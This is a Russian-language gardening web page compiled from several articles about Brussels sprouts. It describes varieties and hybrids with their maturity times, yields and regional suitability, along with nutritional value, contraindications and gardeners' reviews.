2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Лучшие сорта и гибриды брюссельской капусты

Лучшие сорта брюссельской капусты

Здравствуйте, дорогие дачники!

Нужно отметить, что капуста брюссельская является позднеспелой овощной культурой. Ранних сортов, на сегодняшний день, не существует. Выбрать нужные сорта брюссельской капусты для выращивания в своем регионе не так и уж сложно, поскольку все они пригодны для любого климата.

Содержание статьи:

Согласно многочисленным отзывам, капуста брюссельская (сорта и гибриды) широко применяется в диетическом питании. Ее рекомендуют употреблять для повышения иммунитета. Этот овощ обогащает организм необходимыми питательными веществами и витаминами (С, А, В), особенно фолиевой кислотой и белком.

Особенности сортов брюссельской капусты

Согласно статистическим данным аграрного рынка восточной Европы, брюссельская капуста не является достаточно популярным сортотипом. Такая тенденция объясняется тем, что основное место в рационе занимает белокочанная, краснокочанная, цветная и капуста кольраби. Но на частных огородах и дачных участках можно увидеть этот интересный овощ.

Селекционеры предлагают новые сорта, которые с удовольствием выращиваются дачниками многих регионов. Таким образом, популяризация данного вида капусты стремительно повышается.

Примечательным является тот факт, что других таких разновидностей среди видов и сортов капусты не существует на сегодняшний день.

Чем данный овощ выделяется среди остальных? Уникальным является строение растения. Основа – толстый центральный стебель, на верхушке которого разрастаются кустообразным образом листья. Из далека брюссельская капуста похожа на карликовую пальму. Высота стебля не превышает 80 см. Его плотность жестковатая и крепкая.

Особенность брюссельской капусты в том, что на стебле обильно размещаются мелкие головки, которые похожи на грецкие орехи или зеленые помидоры Черри. По форме и строению они напоминают точные копии плодов белокочанной капусты. Вес каждой миниатюрной головки не превышает 20-30 гр. На одном стебле может вырастать до 50 мелких, овально-округлых плодов, до 5 см. в диаметре. В основном преобладают зелёно-белые и светло-салатовые тона. Именно так выглядит брюссельская капуста. Выращивание этой огородной культуры позволит получить хороший урожай и разнообразить обеденный стол.

Среди свойств брюссельской капусты следует отметить отличную устойчивость к холодам. Семена этого овоща могут начать прорастать уже при температуре +20 градусов. Среди всех видов этого овоща она одна из самых морозостойких. Полностью убирают растение поздней осенью.

Урожайность очень хорошая. За время всего вегетационного периода с одного квадратного метра площади можно собрать до 17 кг. урожая. В среднем за один сбор собирают до 5 кг изящных плодов.

Брюссельскую капусту используют для приготовления различных вкусных блюд.

Также она отлично подходит для консервирования.

Лучшие сорта брюссельской капусты

Селекционеры дают несколько советов, по которым лучше всего выбирать лучшие сорта брюссельской капусты для Подмосковья, для Сибири, для Урала. Если правильно ими воспользоваться, то можно получить максимальный урожай. Также позиционируются сорта брюссельской капусты для Средней полосы и для Северо-Запада.

Первое, на что нужно обратить внимание, это срок созревания. Максимальный период может и не ограничиваться 170 сутками. Некоторые дачники Южных регионов могут собирать урожай и в декабре, что абсолютно недопустимо для областей с холодным климатом.

Как отмечалось, брюссельская капуста ранних сортов не имеет, существуют только среднепоздние (Вертус, Розелла — германской селекции, Мачуга — польской селекции) и поздние (Гронигер — германской, Long island и Мезо нано — итальянской, Кетскилл — американской селекции).

Второй критерий, по которому следует выбирать брюссельскую капусту – урожайность. В среднем одно растение дает около 50 плодов, но существуют сорта, которые могут давать до 70 плодов. К ним относится Геркулес 1342.

Третий критерий – биохимический состав. В современных селекционных разработках, которые в основном зарубежные, содержится много белка, минералов и витаминов, фолиевой кислоты и каротина. Между сортами и гибридами нужно выбирать именно гибридную капусту. Она на генетическом уровне защищена от болезней и вредителей.

Очень редкие сорта брюссельской капустыНагаока Кросс F1 или Джейд Кросс F1, что в принципе одно и то же, предлагают японские селекционеры. Они широко распространены в странах Западной Европы.

Лучшие сорта брюссельской капусты:

  • Перфекшн. Среднепоздняя, отменная капуста российской селекции. Считается лучшим сортом брюссельской капусты для Подмосковья и для Сибири. Урожайность достигает до 5 кг. спелых плодов с одного куста в год. Обладает прекрасными вкусовыми качествами, очень полезна. Употребляется в любом виде.
  • Завитка. Позднеспелая капуста. Один из лучших сортов брюссельской капусты для Средней полосы. Подходит для выращивания в иных областях России, а также в Украине и Беларуси. Первые плоды можно собирать на 160 сутки. Плодоносит до 180-го дня. Особенность сорта в том, что на его 90-сантиметровом стебле образовывается множество небольших кочанов, весом в 15 г. Диаметр каждого плода достигает 5 см. Очень урожайный сорт.
  • Боксер F1. Среднепоздний гибридный сорт брюссельской капусты. Для Урала подойдет отлично. С одной сотки можно собрать до 16 кг. спелых кочанчиков. Даная капуста имеет устойчивость к многим заболеваниям и вредителям.

Кроме вышеперечисленных также можно выбрать сорта Касио и Долмик F1.

Капуста-роза из Брюсселя

Брюссельская капуста имеет совершенно необычный внешний вид. Привлекают внимание её форма и кочанчики миниатюрного размера. А ещё у брюссельской красавицы множество полезных свойств. Это прекрасный продукт для любителей правильного питания и тех, кто соблюдает диету.

Брюссельская капуста: описание и основные характеристики

Брюссельская капуста — искусственно выведенная культура. Её ближайшие родственники:

У себя на родине этот вид капусты называется «розенколь», то есть капуста-роза.

Плоды у брюссельской капусты расположены ниже основных листьев

История появления

Впервые научно описал этот вид капусты шведский естествоиспытатель Карл Линней. Он же и придумал для неё такое название в честь овощеводов из Брюсселя, которые вывели это растение из листовой капусты. Из Бельгии овощная культура распространилась по всей Западной Европе. Россия познакомилась с ней в середине XIX века, но широкого распространения в те времена брюссельская капуста не получила. Да и сейчас этот овощ не очень популярен у огородников: эффективнее выращивать обширные площади белокочанной капусты, ведь миниатюрные плоды брюссельской не дают большого экономического эффекта.

Главный поставщик брюссельской капусты в настоящее время — Голландия. Там же выведены и основные современные сорта. Российские селекционеры тоже могут похвастаться целой серией сортов — с более коротким сроком вегетации и устойчивостью к холодам.

Плоды брюссельской капусты — это не кочаны, а всего лишь кочанчики

Внешний вид

Брюссельская капуста внешне сильно отличается от других видов капусты. По форме она напоминает маленькую пальму. На толстом стебле высотой 20–60 см размещены длинночерешковые листья средней величины. На верхушке они создают розетку. Плоды имеют форму мелкого кочана величиной с грецкий орех, образуются в пазухах листьев в первый год. С одного растения можно получить от 40 до 60 таких кочанчиков. На второй год растение цветёт и даёт семена.

Брюссельская капуста имеет необычный внешний вид

Регион выращивания

Сейчас эта овощная культура очень востребована в Западной Европе, США и Канаде. Россия же только присматривается ней.

Ценность брюссельской капусты

Этот вид капусты ценен высоким содержанием полезных веществ. Особенно много в брюссельской капусте витаминов группы В. Кроме того, в ней содержатся витамины: А, С, F, а также Е, К, РР.

Макроэлементы (на 100 г):

  • калий — 389 мг,
  • кальций — 42 мг,
  • магний — 23 мг,
  • натрий — 25 мг,
  • фосфор — 69 мг.

Микроэлементы (на 100 г):

  • железо — 1.4 мг,
  • марганец — 0.337 мг,
  • медь — 70 мкг,
  • селен — 1.6 мкг,
  • цинк — 0.42 мг.

Полезные свойства

Овощ имеет много полезных свойств:

  1. Брюссельская капуста помогает оставаться молодыми, т. к. содержит богатый антиоксидантный состав.
  2. Легкоусвояемое железо предупреждает анемию у детей и беременных.
  3. Брюссельская капуста укрепляет иммунную систему.
  4. Витамин А способствует улучшению зрения.
  5. Высокое содержание белка при низкой калорийности делает капусту особенно полезной для снижения веса.
  6. Овощ помогает нормализовать уровень холестерина.
  7. Высокое содержание клетчатки хорошо влияет на пищеварительную систему.

Брюссельская капуста — полезный диетический продукт

Видео: чем полезна брюссельская капуста

Противопоказания брюссельской капусты

Нежелательно употребление этого вида капусты при подагре. Это связано со значительным содержанием в ней пуринов, которые способствуют накапливанию в суставах и почках кристаллов мочевой кислоты — главной причины подагрического артрита. При гастрите, вздутии живота (метеоризме), ослаблении функции поджелудочной железы, повышении уровня кислотности употребление брюссельской капусты также не рекомендуется.

Сравнение брюссельской капусты с другими видами капусты

По сравнению с белокочанной, брюссельская капуста более питательна. В ней содержится 3–5% белка, что больше в 2 раза, чем в других видах капусты. Медики приравнивают бульон из брюссельской капусты по полезности к куриному. Углеводов же в ней меньше в 2 раза, чем в белокочанной. По витаминному составу брюссельская капуста может посоревноваться с кольраби и брокколи.

В Бельгии шутят, что детей находят в брюссельской капусте

Применение овоща

Брюссельская капуста в нашей стране — пока ещё блюдо для гурманов, но есть надежда, что и у нас она получит большее распространение.

Употребление в пищу

Калорийность брюссельской капусты — всего 43 кКал на 100 г.

Из диетических кочанчиков прекрасно получаются первые и вторые блюда:

  • лёгкие супы,
  • овощное рагу,
  • нежные запеканки.

Для длительного хранения их предварительно бланшируют и замораживают. А самый полезный способ готовки — это обработка паром.

Самый полезный способ готовки — обработка паром

В Англии традиционно брюссельскую капусту подают на Рождество как гарнир к рождественскому гусю.

Видео: как приготовить брюссельскую капусту с грибами

В народной медицине

Сок растения в сочетании с соками других овощей используют для лечения болезней органов дыхания. Применяют их и при сахарном диабете.

Виды и сорта брюссельской капусты

При выборе сорта важно учитывать такие характеристики, как:

  • Срок созревания. Для вызревания растению требуется не менее 130 дней. Чем восточнее расположена зона посадки, тем больше причин посадить скороспелый сорт.
  • Урожайность. Сорт Геркулес, который у нас известен более других, даёт в среднем около 40 кочанчиков. Новые гибридные сорта более продуктивны.
  • Наличие полезных веществ. В современных гибридах белка и минеральных веществ содержится больше.

Таблица: популярные в России сорта брюссельской капусты

Сорт Страна Описание сорта
Боксёр (F1) Голландия Среднеспелый, урожайный, морозоустойчивый, хорошо хранится.
Геркулес 1342 Россия Позднеспелый, морозоустойчивый, самый распространённый сорт в России.
Долмик (F1) Голландия Раннеспелый, особенно подходит для выращивания в Сибири и на Урале.
Завитка Чехия Позднеспелый, морозоустойчивый.
Касио Чехия Среднеспелый, прекрасные вкусовые качества.
Розелла Германия Среднеспелый, районирован по РФ в 1995 году, урожайность хорошая (до 50 кочанчиков), дружная отдача урожая.
Долорес (F1) Бельгия Среднепоздний, морозоустойчивый.
Руднеф Россия Раннеспелый, устойчив к заморозкам до -7 о С, высокоурожайный, подходит для зоны Нечерноземья.
Сапфир Россия Позднеспелый, морозоустойчивый, урожайность до 2,5 кг/м 2 .
Весёлая компания Россия Среднеспелый, устойчив к холодам, созревание дружное.
Командор Россия Среднепоздний.
Диабло (F1) Голландия Среднепоздний, морозоустойчивый, на одном растении 45–50 кочанчиков.
Гранатовый браслет (F1) Россия Среднеспелый, с пурпурными листьями и кочанчиками, устойчив к холодам.
Бриллиант (F1) Голландия Позднеспелый, кочанчики сине-зелёного цвета, урожайность до 3 кг/м 2 .
Зимушка Россия Позднеспелый, устойчив к холодам.
Фальстаф Великобритания Позднеспелый, кочанчики пурпурно-красного цвета.
Гранат Россия Среднеспелый, кочанчики мелкие, фиолетово-красные.

Фотогалерея: сорта брюссельской капусты

В Подмосковье

Лучшими для Подмосковья сортами брюссельской капусты считаются Геркулес, Перфекшн и гибрид Боксёр. Это среднепоздние сорта, они не боятся отрицательных температур, что помогает гибридам вызреть и сформировать урожай.

Лучшими сортами брюссельской капусты в Подмосковье показали себя Геркулес, Перфекшн и Боксёр (F1)

В средней полосе

Для средней полосы наиболее подойдёт чешский сорт Завитка. Готовые плоды его можно собирать через 160 суток. Сорт очень урожайный. Кроме того, хорошо себя проявили сорта Касио и Долмик (F1).

Брюссельская капуста бывает разных цветов: зелёная, светлая, сине-зелёная и даже красная. Красный цвет растению придаёт высокое содержание антоцианов.

На Урале и в Сибири

Вегетационный период у брюссельской капусты затягивается на 160–180 дней, поэтому в Сибири и на Урале возможно только рассадное её выращивание. Высаживать рассаду в открытый грунт следует в начале июня. Лучшим сортом для выращивания в Сибири и на Урале считается сорт Долмик (F1). Кроме него, можно сажать среднеспелые сорта Перфекшн, Боксёр, Зимушка и Диабло.

Некоторые сорта брюссельской капусты не боятся низких температур

Отзывы садоводов о выращивании брюссельской капусты

Брюссельская капуста очень, очень вкусная! Я жарю мелко нарезанный чеснок, обжариваю его с болгарским перцем, туда же вымоченные в слегка солёной воде, отжатые и порезанные баклажаны, минут через 5 ошпаренные кочанчики брюссельской капусты немного жарим, затем туда добавляем домашний соус и сметанку, гвоздику и, если есть, базилик, всё это тушим ещё минут 5–10 (как терпенья хватит), и вот — вкуснейшее кушанье. Можно по желанию туда и колбаски порезать и (или кабачки). Извините, что не в тему. Теперь к агротехнике — в конце августа обязательно удалить точку роста. Тогда урожай брюссельской капусты вам обеспечен. С уважением, Ирина.

Ирина, Пермский край

http://forum.vinograd.info/showthread.php?t=1842&page=60

Я сажала брюссельскую капусту два сезона. Первый раз готовую рассаду дала соседка, сорт не знаю. Выросла вполне хорошая. Второй — сама посеяла в теплицу 30 марта сорт Дружная семейка. Кочанчики получились мельче, и впечатление такое, что времени ей не хватило. Обратила внимание, что все сорта среднепоздние, ранних нет. В этом году купила наугад семена Геркулес 1342. Посеяла их уже на окне в торфяные таблетки, взошли дружно. Попытка вырастить капустную рассаду на окне в прошлый год закончилась неудачей. Всё дружно взошло, потом также дружно попадало. Что могу сказать ещё о Брюссельской капусте — растёт без проблем и вредителей. Вкус — ну не наш он, ребята, какой-то непривычный. Слегка отварить в воде, чеснока выдавить, заправить растительным маслом и серьёзно так сказать себе, что она очень полезна.

Любовь Сергеевна, г. Ульяновск

http://forum.vinograd.info/showthread.php?t=1842&page=60

Если вы попробуете приготовить у себя на кухне эту замечательную незнакомку, называемую в старинных рецептах красивым именем розенколь, то обязательно в неё влюбитесь. Ведь при кулинарной обработке брюссельская капуста приобретает тонкий грибной вкус. И если у вас нет подагры, изжоги и метеоризма — это ваш продукт!

Лучшие сорта брюссельской капусты

Лучшие сорта и гибриды брюссельской капусты

Полезная и питательная брюссельская капуста формирует высокий крепкий стебель, в пазухах которого образуются маленькие кочанчики количеством от 20–40 до 100 штук и более. Миниатюрные капусточки богаты витаминами, минералами, органическими кислотами и биологически активными веществами, в том числе эфирными маслами, придающими блюдам пикантность и особый аромат.

Брюссельская ‒ одна из самых вкусных и насыщенных ценными веществами разновидностей капустной культуры, характерна высоким содержанием легкоусвояемого белка, не уступающего по своим качествам мясному и молочному протеину, концентрация которого достигает 4,5–6,5%, что в несколько раз выше, чем у других видов капустных овощей.

Как вырастить этот вид капусты у себя на даче вам подскажет статья «Брюссельская капуста».

Ранние сорта и гибриды

Франклин F1

Брюссельская капуста сорт Франклин F1

Крепкие урожайные растения образуют товарные кочанчики в ранние сроки, период ожидания урожая – 150–160 суток. Листья средние или крупные, зеленого цвета с незначительным сизым налетом, пузырчатые, сидят на небольших черешках. Кочанчики округлой формы, довольно крупные, количеством до 70 штук, плотно расположены на стебле, общий вес достигает 1 кг. Вкус превосходный.

Капуста устойчива к похолоданию, практически невосприимчива к фузариозному увяданию, урожаи отборных кочанчиков стабильные и высокие – до 28 кг с 10 кв. м.

Лонг Айленд

Брюссельская капуста сорт Лонг Айленд

Неприхотливый надежный сорт американской селекции относится к ранней категории, хорошо переносит весенние заморозки. Стебель невысокий, крепкий, покрыт среднего размера пузырчатыми листьями со слабым восковым налетом. Кочанчики круглой формы, зеленого цвета, плотной структуры. На стебле формируется 50–80 маленьких вилков, весом 11–12 г каждый. Общий вес достигает 0,8 кг. Вкусовые качества отличные.

Растения устойчивы, слабо поражаются грибковыми инфекциями, общие урожаи составляют около 8–12 кг с 10 кв. м.

Розелла F1

Брюссельская капуста сорт Розелла F1

Посадки среднераннего гибрида немецкой селекции отличаются одновременным созреванием на 160–165 сутки после посева. Стебель высокий, покрыт крупными, умеренно пузырчатыми листьями темно-зеленого цвета, листовые пластины вогнуты внутрь, края загнуты. Восковой налет незначительный.

Кочанчики одномерные, весом около 13 г, округлой формы, немного вытянутые, светло-зеленого цвета. Структура вилков умеренно плотная, вкус хороший. Урожаи регулярные, формируются дружно и достигают 11–17 кг с 10 кв. м. Овощи годятся для заморозки, во время которой не теряют вкусовых свойств и структуры.

Среднеспелые сорта и гибриды

Веселая компания

Брюссельская капуста сорт Веселая компания

Яркий сорт поспевает через 160–170 суток после появления полноценных всходов. Стебли средней высоты, требуют подвязки. Кочанчики небольшие, округло-вытянутые, зеленовато-пурпурной окраски, весом 10–12 г, плотно расположены в пазухах листьев, на одном растении образуется до 60 вилков. Общий вес – около 0,6 кг. Внутренняя структура умеренно плотная, вкусовые качества хорошие.

Сорт отличается привлекательным внешним видом, превосходной урожайностью, годится для приготовления разнообразных блюд и маринадов, хорошо сохраняет свойства при заморозке. Урожаи достигают 24 кг с 10 кв. м.

Гранатовый браслет F1

Брюссельская капуста сорт Гранатовый браслет F1

Урожайный устойчивый гибрид характерен колоритными пурпурными кочанчиками, пригодными к съему через 120–125 суток после высадки рассады. Пурпурно-фиолетовые пузырчатые листья слегка покрыты восковым налетом, без волнистости, плотно посажены на коротких черешках. Кочанчики округлые, густого пурпурного цвета, образуются на одном стебле по 30–40 штук, общим весом 0,4–0,5 кг.

Неприхотливые растения выдерживают заморозки, формируют стабильные урожаи до 15–20 кг с 10 кв. м. Вкусные плотные вилки характерны пикантным вкусом и аппетитно выглядят в блюдах.

Геркулес

Брюссельская капуста сорт Геркулес

Наиболее распространенный сорт брюссельской капусты отечественной селекции пригоден к съему на 145–160 сутки после всходов. Стебли средней высоты – до 45–60 см. Овальные темно-зеленые кочанчики весом около 10 г нарастают на стебле по 20–30 штук, образуя расширенный книзу конус. Внутренняя структура рыхлая, за счет гофрированности листочков. Общий вес 0,2–0,3 кг.

Растянутость отдачи урожая позволяет длительно получать свежий витаминный продукт, для чего плотные вилки снимают по мере созревания. Растения холодоустойчивы и слабо поражаются грибковыми инфекциями, урожаи составляют 20–24 кг с 10 кв. м.

Позднеспелые сорта и гибриды

Санда

Брюссельская капуста сорт Санда

Сорт относят к среднепоздней категории – срок ожидания около 170–175 суток. Для лучшего вызревания за две недели до уборки урожая выполняют укорачивание центрального стебля. Кочанчики круглые, зеленовато-белые, диаметром 3–4 см, весом 12–15 г, образуются по 20–40 штук на одном стебле, и общий вес достигает 0,3–0,6 кг.

Вкус плотных вилков превосходный, урожаи составляют около 20 кг с 10 кв. м, пригодны для замораживания, потребления в свежем виде и квашения.

Завитка

Один из лучших сортов позднеспелой брюссельской капусты вывели чешские селекционеры. Период ожидания урожая – 170–180 суток от момента всходов. Стебли крепкие, высотой до 90 см. Кочанчики одномерные, красивые, округлые, весом 10–15 г, формируются по 50–70 штук на одном стебле, очень вкусные.

Получение вызревшего урожая возможно при раннем высаживании рассады, а с наступлением холодов капустные растения прикапывают в подвале, собирая свежие маленькие вилки до начала зимы. Урожаи достигают 20 кг с 10 кв. м.

Командор

Брюссельская капуста сорт Командор

Среднепоздний сорт растянутого периода плодоношения собирают через 4–5 месяцев после высадки двухмесячной рассады. Стебли средней высоты формируют по 20–40 округлых зеленых кочанчиков весом 10–14 г. Общий вес – до 0,55–0,6 кг. Снимают вилки по мере закрытия и достижения нужной плотности. Вкус и питательные свойства сорта отличные.

Общие урожаи составляют до 23 кг с 10 кв. м. Использование универсальное – плотные кочанчики отлично подходят для салатов, оригинальных гарниров, горячих блюд, заморозки.

Холодостойкая брюссельская капуста выдерживает заморозки до ‒7°C, а при формировании урожая выдерживают кратковременные морозы до ‒10°C. При этом прищипка стебля уменьшает морозоустойчивость. За счет наличия минералов, в частности, большого количества магния, капустная культура особенно полезна людям с болезнями сердечно-сосудистой системы.

Тугие кочанчики не варят долго – это значительно ухудшает вкусовые качества и уменьшает питательную ценность. Лучше всего употреблять ценный овощ при минимальной тепловой обработке – в свежем и квашеном виде, в маринадах, диетических пюре и ароматных запеканках.

Какие сорта брюссельской капусты выбрать

Здравствуйте, уважаемые читатели!

Брюссельская капуста Франклин F1

В предыдущей статье можете прочитать ботаническое описание и биологические особенности брюссельской капусты.

До недавнего времени нашими огородниками выращивалось совсем немного сортов брюссельской капусты. О ней долго говорили как о культуре одного сорта: добротный отечественный Геркулес был создан 65 лет назад. Некоторое разнообразие вносили зарубежные сорта брюссельской капусты, в основном английской и голландской селекции. Потом появились гибриды F1 , большинство из них хорошо подходят для выращивания в наших климатических условиях. У них высокое качество семян, хорошие урожаи. Как правило, растения компактные, с плотной посадкой ровных калиброванных кочанчиков, которые дружно созревают, редко болеют. Правда, противники гибридов утверждают, что урожай на сортовых растениях крупнее и вкуснее, а плодоношение длится дольше. Так ли это вы можете проверить на своих огородах.

Однако самое важное, на что обязательно нужно обратить внимание при выборе сорта брюссельской капусты – скороспелость. Дело в том, что эта капуста медленно растет и долго формирует кочаны. От посева до готовности кочанчиков проходит 135-175 дней. Поэтому, чтобы труд не пропал зря, для Средней полосы и Нечерноземья нужно выбирать раннюю брюссельскую капусту. Например, гибриды F1 Франклин, Диабло, сорт Розелла.

Франклин F1 – Самый ранний голландский гибрид из имеющихся на нашем рынке. Растение холодостойкое, крепкое, среднего размера. Кочанчики темно-зеленые, ровные, округлые, плотные, до 70 штук. Вкус отличный. Урожайность около 2,8 кг с 1 кв. м. Гибрид устойчив к фузариозу.

Диабло F1 – Среднеранний холодостойкий голландский гибрид. На сильном прямом стебле средней высоты 40-55 зеленых округлых кочанчиков, которые очень плотные, среднего размера, в общей массе до 0,9 кг. Урожайность 2,1 кг с 1 кв. м. Устойчив к фузариозу.

Розелла – Среднеранний немецкий сорт брюссельской капусты. Растения от средних до высоких. Кочанчики зеленые, среднего размера, плотность удовлетворительная, на одном растении до 45 штук. Вкус хороший. Созревание дружное. Урожайность до 1,7 кг с 1 кв. м.

Бриллиант F1 – Поздний голландский гибрид. Кочанчики сине-зеленые, плотные, округлые, преимущественно крупные. На стебле плотно и равно размещаются 35-60 штук. Вкус хороший, урожайность до 3 кг с 1 кв. м. Устойчив против ряда заболеваний, но может поражаться мучнистой росой и ржавчиной.

Веселая компания – Среднеспелый холодостойкий отечественный сорт брюссельской капусты. Растения среднего размера. Кочанчики темно-зеленые с сильным антоцианом, среднего размера, до 60 штук на стебле, общая масса кочанчиков до 600 г. Урожайность 1,2-1,8 кг с 1 кв. м. Вкус хороший, созревание дружное.

Геркулес – Самый распространенный отечественный сорт. Среднепоздний. Растение высотой около 50 см. Кочанчики овальные, крупные и средней величины, не очень плотные, общая масса урожая с одного растения около 300 г. Созревание растянутое. Урожайность 0,4-0,6 кг с 1 кв. м. Сорт холодостойкий, устойчивость к киле средняя.

Гранатовый браслет F1 – Среднеспелый отечественный гибрид. Растение высотой 60-70 см с пурпурными листьями и кочанчиками. Их количество 30-40 штук, общей массой 400-500 г. Некрупные, округлые кочанчики обладают отличными вкусовыми и диетическими качествами. Урожайность 1,5-1,9 кг с 1 кв. м. К холодам устойчив, выдерживает похолодание до 8 градусов.

Касио – Среднеспелый чешский сорт брюссельской капусты. Высота растений 110-125 см. Кочанчики сине-зеленые, плотные, небольшие, прекрасного вкуса, 60-70 штук на растении. Созревание растянутое. Урожайность 2-3 кг с 1 кв. м.

Командор – Среднеспелый отечественный сорт. Растение среднерослое, кочанчики зеленые, плотные от мелких до средних, по 25-40 штук на стебле, общей массой 450-550 г. Вкус хороший. Урожайность около 2 кг с 1 кв. м.

Сапфир – Поздний отечественный сорт брюссельской капусты. Кочанчики плотные, диаметром 2-4 см, на растении около 30 штук, общей массой до 0,5 кг. Вкус отличный. Урожайность до 2,5 кг с 1 кв. м.

Помимо этих сортов и гибридов на рынке появляется много перспективных разработок селекционеров: среднеранний Лонг-Айленд; среднеспелый Боксер F1, устойчивый к низким температурам; среднепоздняя Санда, очень вкусная, холодостойкая, устойчивая к слизистому бактериозу. Среди красно-фиолетовых сортов брюссельской капусты интересны английский поздний Фальстаф и среднеспелый отечественный Гранат. Фальстаф имеет пурпурно-красные кочанчики великолепного нежного вкуса. У Граната кочанчики мелкие, интенсивность их окраски усиливается при понижении температуры.

Автор: Татьяна Казакова

Еще читайте статьи о выращивании капусты:

Спасибо, что посетили мой блог!

Надеюсь, что Вы с интересами ознакомились с материалами этой статьи, и она оказалась вам полезной. Возможно, материалы, изложенные в статье, считаете спорными, и Вы с чем-то не согласны, то поделитесь своим мнением в комментариях. Если затронутая тема вам интересна, и Вы разделяете точку зрения автора, поделитесь этими материалами со своими друзьями в соцсетях, воспользовавшись кнопочками под статьей. А так же на блоге предусмотрена бесплатная форма подписки, чтобы Вы могли первыми получать новые статьи о выращивании капусты на свой электронный адрес:

Сорта брюссельской капусты, которые лучше выращивать в разных регионах России. Правила выбора

Брюссельскую капусту не часто встретишь на дачных участках. Многие огородники настороженно относятся к этой культуре, возможно, из-за ее необычного вида, непохожего на другие распространенные капусты. Ее маленькие кочанчики по вкусовым качествам, питательности и содержанию белка опережают белокочанную капусту! Современная селекция не стоит на месте и предлагает широкий выбор сортов и гибридов на любой вкус.

Основные правила выбора вида

Чтобы правильно подобрать семена брюссельской капусты, необходимо придерживаться простых правил выбора сорта:
  1. Сорт или гибрид? В продаже встречаются сорта и гибриды первого поколения. Сорта получают путем скрещивания отобранных растений-родителей. Каждый сорт имеет свой набор положительных отличительных качеств, передающихся из поколения в поколение.Гибриды первого поколения получаются в результате ежегодной селекции подобранных сортов. На упаковке семян гибриды отмечаются значком F1. Они более устойчивы к болезням, вредителям, неблагоприятным условиям, но при семенном размножении специфические качества гибрида не передаются.
  2. Срок созревания. Это период от всходов до сбора урожая, разделяющий все капусты на ранние, среднеспелые и поздние.

Огородники южных регионов могут собирать урожай капусты в декабре, что невозможно для жителей средней полосы и регионов Сибири.

Сорта

Позднеспелые

Урожай такой капусты собирают через 180-200 дней после появления всходов.

Бриллиант

Культура имеет приподнятую розетку темно-зеленых крупных листьев, густо покрытых восковым налетом. На одном растении созревает до 30-40 кочанчиков яйцевидной формы и сине-зеленого цвета, массой от 15-20г. Отличается устойчивостью к полеганию и стрелкованию.

Гронингер

Капуста немецкой селекции. Растение вырастает до 70 см. С одного растения можно собрать до 80 плотных темно-зеленых кочанчиков превосходного вкуса, весом 18 г, которые лучше использовать после замораживания. В свежем виде они слегка горчат. Особенностью капусты является высокая устойчивость к болезням, суперурожайность, повышенное содержание полезных веществ.

Дружная семейка

Сильнорослое растение, высотой до 1,5м. Листья крупные, зеленые. Кочанчики зеленые, диаметром 3-4 см, плотные, весом до 15 г. Урожайность – 60 кочанов с растения. Ценность культуры: устойчивость к слизистому бактериозу, лежкость, морозоустойчивость.

Видео о сорте Дружная семейка:

Фальстаф

Яркий пурпурно-фиолетовый новый сорт из Англии! Листья фиолетово-зеленые. Соцветия плотные, ровные, пурпурные, по 15 г каждый. Вкус нежный, не теряется при замораживании.

Зимушка

Выведена русскими селекционерами в 2012 году. На высоких стеблях (120 см) формируется большое количество мелких (2-3 см) плотных кочанчиков. Характеризуется дружной отдачей урожая и высокой морозоустойчивостью. Выдерживает морозы до -10 градусов.

Среднепоздние

Кочанчики собирают через 140-180 дней. Они отличаются хорошей лежкостью, устойчивостью к транспортировке, большей массой овоща и высокой урожайностью.

Санда

За 170 дней вырастают высокие, до 1 м в высоту, стебли. Листья темно-зеленые, покрыты выраженным восковым налетом. На одном растении формируется до 20-40 кочанов средней плотности и правильной круглой формы. На разрезе кочанчики имеют желтоватый оттенок. Идеален для замораживания и консервации, подходит для длительного хранения и транспортировки. Теплолюбива и боится сквозняков.

Геркулес

Старый отечественный сорт, морозоустойчивый и годный к длительному хранению. Срок получения урожая – 140-160 дней. Высота растения – до 60 см. Листья зеленые, гофрированные. Кочанчики на стебле имеют конусообразное расположение, в количестве до 40 шт. Отличается повышенным содержанием белка и витамина С.

Видео о сорте брюссельской капусты Геркулес:

Созвездие

Новинка, выведена в 2016 году. Формирует полувертикальную розетку зеленых пузырчатых листьев. Кочанчики обратнояйцевидные, крупные, массой до 2-2,5 г. Хороша для употребления в свежем виде, плохо хранится.

Завитка

Выведен чешскими селекционерами и известен в нашей стране с 1995 года. Растение высокорослое, до 80 см. Листья морщинистые, серо-зеленые. С одной культуры собирают 30-35 зеленых крупных кочанчиков средней плотности, диаметром до 5 см и массой до 15 г. Особенностью является высокая потребность культуры в поливах во время формирования кочанов и высокая морозоустойчивость.

Боксер F1

Гибрид родом из Нидерландов. Растение высокорослое (до 1 м) с листьями насыщенно-зеленой окраски. Период от всходов до спелости – 140 дней. Мелкие округлые кочанчики циллиндрически расположены на стеблях.

Капуста устойчива к пониженным температурам, при сборе урожая после заморозков наблюдается улучшение вкусовых качеств. Культура отличается дружной отдачей урожая, устойчивостью к грибковым и бактериальным заболеваниям и вредителям.

С 60-х годов самым популярным сортом среди брюссельских капуст является «Геркулес», полюбившийся огородникам за крупные соцветия и устойчивость к болезням.

Среднеранние

Эта категория объединяет брюссельскую капусту, созревающую через 120-140 дней. Она доступна к выращиванию в северных регионах в открытом грунте, но при понижении ночных температур ниже 0°C кочанчики придется снимать даже, если они не полностью сформировались. Преимуществом является более длительный срок хранения и устойчивость к транспортировке.

Диабло

Гибрид родом из Голландии, даст хороший урожай в любом климатическом регионе за 140 дней. Кочанчики светло-зеленого цвета, средней плотности и размеров, вкусны в кулинарии и свежем виде. Отличается повышенной требовательностью к наличию азота в почве.

Предлагаем посмотреть видео с описанием и характеристиками сорта брюссельской капусты Диабло:

Командор

Новинка, созданная в 2011 году. Вегетационный период составляет 122 дня. На одном растении формируется 20-30 кочанчиков красивого изумрудного цвета, каждый весом по 15 г. Эта капуста идеальна для замораживания.

Долмик F1

Выведен в Ниндерландах. Листья серо-зеленые с сильно-выраженным восковым налетом. Средний вес кочана 7-17 г.

Гранатовый браслет F1

Гибрид отечественной селекции. Растения вырастают до 60 см с ярко-пурпурными листьями, в пазухах которых созревают небольшие фиолетовые кочанчики. Круглые и плотные, они созревают за 120 дней. Овощ используется в свежем виде, консервации и недлительного хранения. Выдерживает заморозки до -7°C . С квадратного метра собирают 1,5–2 кг.

Веселая Компания красная

Еще один «красный» вариант брюссельской капусты, созревающий за 130-135 дней. Растения среднерослые, с крупной зелено-пурпурной листвой. Кочанчики антоциановой окраски, весом 10-12 г. Огородники ценят эту капусту за лежкость, транспортабельность, дружное формирование урожая и необычный цвет.

Раннеспелые

Вегетационный период ранних сортов составляет 85-120 дней, что позволяет собирать полноценно вызревший урожай до наступления заморозков.

Франклин F1

